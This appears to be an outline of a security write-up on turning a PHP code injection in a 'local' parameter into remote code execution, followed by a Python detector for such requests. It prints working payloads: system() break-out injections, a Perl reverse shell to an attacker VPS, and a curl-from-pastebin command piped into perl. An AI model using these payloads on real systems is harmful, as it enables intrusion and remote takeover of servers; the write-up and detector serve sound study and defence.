RCE By Code Injection | Perl Reverse Shell

What is the PHP code injection weakness?

Background story

No reflected string
Remote Code Execution

The expected backend code:

$input = $_REQUEST['local'];

Getting Reverse Shell

'.system("nc -v").'
No data reflected, meaning the command was not performed
Found Perl v5.20
perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Request syntax error because of the [&] sign
'.system("curl -v").'
use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
curl https://pastebin.com/raw/EEaH**** | perl
'.system("curl https://pastebin.com/raw/EEaH**** | perl").'
Reverse Shell via Perl
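
The payloads above share one shape: a quote that closes the PHP string, a concatenation dot, then a command-execution call. The Python detector below is an added example, not code from the original post; the function names, regexes and constructed sample requests (including the paste.example host) are assumptions for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# PHP calls that run OS commands or evaluate code.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval)"
# Quote closing the string, concatenation dot, then one of those calls.
BREAKOUT = re.compile(r"""['"]\s*\.\s*""" + EXEC_FUNCS + r"\s*\(", re.I)
# Download piped straight into an interpreter.
PIPE_TO_INTERP = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:perl|sh|bash|python|php)\b", re.I)

# Constructed sample requests (not taken from real logs).
SAMPLE_REQUESTS = [
    "/index.php?local=en",
    "/index.php?local=%27.system(%22curl%20-v%22).%27",
    "/index.php?local=%2527.system(%2522curl%2520-v%2522).%2527",  # double-encoded
    "/index.php?local=%27.system(%22curl%20https://paste.example/raw/x"
    "%20%7C%20perl%22).%27",
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(url):
    """Return (parameter, reason) findings for one request URL."""
    findings = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = decode_fully(raw)  # parse_qsl has already decoded once
        if BREAKOUT.search(value):
            findings.append((name, "string break-out into exec function"))
        if PIPE_TO_INTERP.search(value):
            findings.append((name, "download piped to interpreter"))
    return findings

def scan(requests):
    """Map each flagged request to its findings; clean requests are omitted."""
    return {r: f for r in requests if (f := inspect_request(r))}

if __name__ == "__main__":
    for req, found in scan(SAMPLE_REQUESTS).items():
        print(found, req)
```
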

Prevent PHP code injection
